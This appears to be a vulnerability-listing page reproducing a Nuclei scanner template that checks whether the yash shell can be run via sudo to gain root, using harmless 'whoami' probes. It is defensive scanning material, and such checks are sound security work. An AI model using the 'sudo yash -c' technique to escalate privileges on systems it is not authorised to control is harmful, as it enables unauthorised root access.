privesc-yash: Yash - Privilege Escalation

日期: 2025-08-01 | 影响软件: Yash | POC: 已公开

漏洞描述

yash is a POSIX-compliant command shell that aims to be a lightweight and efficient alternative to other shells such as Bash or Zsh.

PoC代码[已公开]

id: privesc-yash

info:
  name: Yash - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    yash is a POSIX-compliant command shell that aims to be a lightweight and efficient alternative to other shells such as Bash or Zsh.
  reference:
    - https://gtfobins.github.io/gtfobins/yash/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,yash,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      yash -c 'whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo yash -c 'whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 490a004630440220152cf11f4d2983024489e58652d409f9a1a1c991a1fc7fe392781b344484da500220035c87d2463b4d07290c7894772892ab7af93fba57f873c1e76490beebeef770:922c64590222798bb761d5b6d8e72950